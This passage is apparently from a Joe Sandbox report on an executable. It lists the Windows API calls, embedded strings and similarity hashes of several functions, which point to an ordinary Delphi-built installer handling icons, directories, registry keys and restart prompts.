                                                                                              • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                              • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                            • String ID: c:\directory$shell32.dll
                                                                                            • API String ID: 3376378930-1375355148
                                                                                            • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                            • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                                            • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                            • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                                            APIs
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                            • API String ID: 4130936913-2943970505
                                                                                            • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                            • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                                            • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                            • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                              • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                              • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                              • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                              • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                                            • API String ID: 854858120-3415487018
                                                                                            • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                            • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                                            • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                            • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                                            APIs
                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                            • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                            • String ID: 2$MAINICON
                                                                                            • API String ID: 3935243913-3181700818
                                                                                            • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                            • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                                            • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                            • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                              • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                              • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                              • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                              • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                              • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                              • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                              • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                              • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                              • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                              • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                            • API String ID: 3476490787-2767913252
                                                                                            • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                            • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                                            • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                            • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID:
                                                                                            • API String ID: 3887896539-0
                                                                                            • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                            • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                                            • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                            • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                                            Strings
                                                                                            • WININIT.INI, xrefs: 00454D00
                                                                                            • PendingFileRenameOperations, xrefs: 00454C70
                                                                                            • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                            • API String ID: 47109696-2199428270
                                                                                            • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                            • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                                            • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                            • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: $pI$.tmp$oI
                                                                                            • API String ID: 1375471231-740224434
                                                                                            • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                            • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                                            • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                            • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                            • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: lAB
                                                                                            • API String ID: 4191631535-3476862382
                                                                                            • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                            • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                                            • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                            • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                            • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                            • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                            • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                            • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                                            • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                            • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                            • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                            • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                                            • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                            • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                            • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                                            • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                            • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                            • RegisterClassA.USER32(?), ref: 004164DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
